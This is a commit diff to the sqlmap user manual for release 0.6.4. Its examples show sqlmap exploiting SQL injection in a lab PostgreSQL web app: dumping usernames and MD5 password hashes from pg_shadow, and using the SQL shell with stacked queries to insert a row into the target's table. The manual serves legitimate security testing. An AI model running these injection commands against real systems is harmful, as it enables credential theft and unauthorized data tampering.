Almost ready with the user's manual for 0.6.4 release
parent
77d9d22ceb
commit
9ab174a444
|
@ -3545,7 +3545,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql
|
||||||
"SELECT usename FROM pg_user" -v 0
|
"SELECT usename FROM pg_user" -v 0
|
||||||
|
|
||||||
[hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
|
[hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
|
||||||
[hh:mm:37] [INPUT] the SQL query provided can return up to 2 entries. How many entries
|
[hh:mm:37] [INPUT] the SQL query provided can return up to 3 entries. How many entries
|
||||||
do you want to retrieve?
|
do you want to retrieve?
|
||||||
[a] All (default)
|
[a] All (default)
|
||||||
[#] Specific number
|
[#] Specific number
|
||||||
|
@ -3643,11 +3643,10 @@ do you want to retrieve?
|
||||||
[a] All (default)
|
[a] All (default)
|
||||||
[#] Specific number
|
[#] Specific number
|
||||||
[q] Quit
|
[q] Quit
|
||||||
Choice:
|
Choice: 2
|
||||||
SELECT usename, passwd FROM pg_shadow ORDER BY usename [3]:
|
SELECT usename, passwd FROM pg_shadow ORDER BY usename [3]:
|
||||||
[*] postgres, md5d7d880f96044b72d0bba108ace96d1e4
|
[*] postgres, md5d7d880f96044b72d0bba108ace96d1e4
|
||||||
[*] testuser, md599e5ea7a6f7c3269995cba3927fd0093
|
[*] testuser, md599e5ea7a6f7c3269995cba3927fd0093
|
||||||
[*] testuser2,
|
|
||||||
</PRE>
|
</PRE>
|
||||||
</CODE></BLOCKQUOTE>
|
</CODE></BLOCKQUOTE>
|
||||||
</P>
|
</P>
|
||||||
|
@ -3788,22 +3787,42 @@ an asterisk instead of the column(s) name, sqlmap first retrieves the
|
||||||
column names of the table then asks if the query can return multiple
|
column names of the table then asks if the query can return multiple
|
||||||
entries and goes on.</P>
|
entries and goes on.</P>
|
||||||
|
|
||||||
<P>Example of SQL statement other than <CODE>SELECT</CODE> on an <B>Oracle XE
|
<P>Example of SQL statement other than <CODE>SELECT</CODE> on a <B>PostgreSQL
|
||||||
10.2.0.1</B> target:</P>
|
8.3.5</B> target:</P>
|
||||||
<P>
|
<P>
|
||||||
<BLOCKQUOTE><CODE>
|
<BLOCKQUOTE><CODE>
|
||||||
<PRE>
|
<PRE>
|
||||||
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --sql-shell -v 1
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 1
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
back-end DBMS: Oracle
|
back-end DBMS: PostgreSQL
|
||||||
|
|
||||||
[hh:mm:20] [INFO] calling Oracle shell. To quit type 'x' or 'q' and press ENTER
|
[10:11:42] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER
|
||||||
sql> TODO
|
sql> SELECT COUNT(name) FROM users
|
||||||
|
[10:11:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
|
||||||
|
[10:11:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
|
||||||
|
[10:11:59] [INFO] query: SELECT COALESCE(CAST(COUNT(name) AS CHARACTER(10000)), CHR(32)) FROM users
|
||||||
|
[10:11:59] [INFO] retrieved: 4
|
||||||
|
[10:11:59] [INFO] performed 13 queries in 0 seconds
|
||||||
|
SELECT COUNT(name) FROM users: '4'
|
||||||
|
|
||||||
|
sql> INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell');
|
||||||
|
[10:12:35] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[10:12:40] [INFO] the web application supports stacked queries on parameter 'id'
|
||||||
|
[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell');'
|
||||||
|
[10:12:40] [INFO] done
|
||||||
|
sql> SELECT COUNT(name) FROM users
|
||||||
|
[10:12:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
|
||||||
|
[10:12:51] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
|
||||||
|
[10:12:53] [INFO] query: SELECT COALESCE(CAST(COUNT(name) AS CHARACTER(10000)), CHR(32)) FROM users
|
||||||
|
[10:12:53] [INFO] retrieved: 5
|
||||||
|
[10:12:54] [INFO] performed 20 queries in 0 seconds
|
||||||
|
SELECT COUNT(name) FROM users: '5'
|
||||||
</PRE>
|
</PRE>
|
||||||
</CODE></BLOCKQUOTE>
|
</CODE></BLOCKQUOTE>
|
||||||
</P>
|
</P>
|
||||||
|
|
||||||
|
<P>TODO</P>
|
||||||
|
|
||||||
|
|
||||||
<H2><A NAME="ss5.8">5.8</A> <A HREF="#toc5.8">File system access</A>
|
<H2><A NAME="ss5.8">5.8</A> <A HREF="#toc5.8">File system access</A>
|
||||||
|
|
BIN
doc/README.pdf
BIN
doc/README.pdf
Binary file not shown.
|
@ -3448,7 +3448,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql
|
||||||
"SELECT usename FROM pg_user" -v 0
|
"SELECT usename FROM pg_user" -v 0
|
||||||
|
|
||||||
[hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
|
[hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
|
||||||
[hh:mm:37] [INPUT] the SQL query provided can return up to 2 entries. How many entries
|
[hh:mm:37] [INPUT] the SQL query provided can return up to 3 entries. How many entries
|
||||||
do you want to retrieve?
|
do you want to retrieve?
|
||||||
[a] All (default)
|
[a] All (default)
|
||||||
[#] Specific number
|
[#] Specific number
|
||||||
|
@ -3544,11 +3544,10 @@ do you want to retrieve?
|
||||||
[a] All (default)
|
[a] All (default)
|
||||||
[#] Specific number
|
[#] Specific number
|
||||||
[q] Quit
|
[q] Quit
|
||||||
Choice:
|
Choice: 2
|
||||||
SELECT usename, passwd FROM pg_shadow ORDER BY usename [3]:
|
SELECT usename, passwd FROM pg_shadow ORDER BY usename [3]:
|
||||||
[*] postgres, md5d7d880f96044b72d0bba108ace96d1e4
|
[*] postgres, md5d7d880f96044b72d0bba108ace96d1e4
|
||||||
[*] testuser, md599e5ea7a6f7c3269995cba3927fd0093
|
[*] testuser, md599e5ea7a6f7c3269995cba3927fd0093
|
||||||
[*] testuser2,
|
|
||||||
</verb></tscreen>
|
</verb></tscreen>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
|
@ -3686,19 +3685,40 @@ column names of the table then asks if the query can return multiple
|
||||||
entries and goes on.
|
entries and goes on.
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Example of SQL statement other than <tt>SELECT</tt> on an <bf>Oracle XE
|
Example of SQL statement other than <tt>SELECT</tt> on a <bf>PostgreSQL
|
||||||
10.2.0.1</bf> target:
|
8.3.5</bf> target:
|
||||||
|
|
||||||
<tscreen><verb>
|
<tscreen><verb>
|
||||||
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --sql-shell -v 1
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 1
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
back-end DBMS: Oracle
|
back-end DBMS: PostgreSQL
|
||||||
|
|
||||||
[hh:mm:20] [INFO] calling Oracle shell. To quit type 'x' or 'q' and press ENTER
|
[10:11:42] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER
|
||||||
sql> TODO
|
sql> SELECT COUNT(name) FROM users
|
||||||
|
[10:11:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
|
||||||
|
[10:11:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
|
||||||
|
[10:11:59] [INFO] query: SELECT COALESCE(CAST(COUNT(name) AS CHARACTER(10000)), CHR(32)) FROM users
|
||||||
|
[10:11:59] [INFO] retrieved: 4
|
||||||
|
[10:11:59] [INFO] performed 13 queries in 0 seconds
|
||||||
|
SELECT COUNT(name) FROM users: '4'
|
||||||
|
|
||||||
|
sql> INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell');
|
||||||
|
[10:12:35] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[10:12:40] [INFO] the web application supports stacked queries on parameter 'id'
|
||||||
|
[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell');'
|
||||||
|
[10:12:40] [INFO] done
|
||||||
|
sql> SELECT COUNT(name) FROM users
|
||||||
|
[10:12:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
|
||||||
|
[10:12:51] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
|
||||||
|
[10:12:53] [INFO] query: SELECT COALESCE(CAST(COUNT(name) AS CHARACTER(10000)), CHR(32)) FROM users
|
||||||
|
[10:12:53] [INFO] retrieved: 5
|
||||||
|
[10:12:54] [INFO] performed 20 queries in 0 seconds
|
||||||
|
SELECT COUNT(name) FROM users: '5'
|
||||||
</verb></tscreen>
|
</verb></tscreen>
|
||||||
|
|
||||||
|
<p>
|
||||||
|
TODO
|
||||||
|
|
||||||
|
|
||||||
<sect1>File system access
|
<sect1>File system access
|
||||||
|
|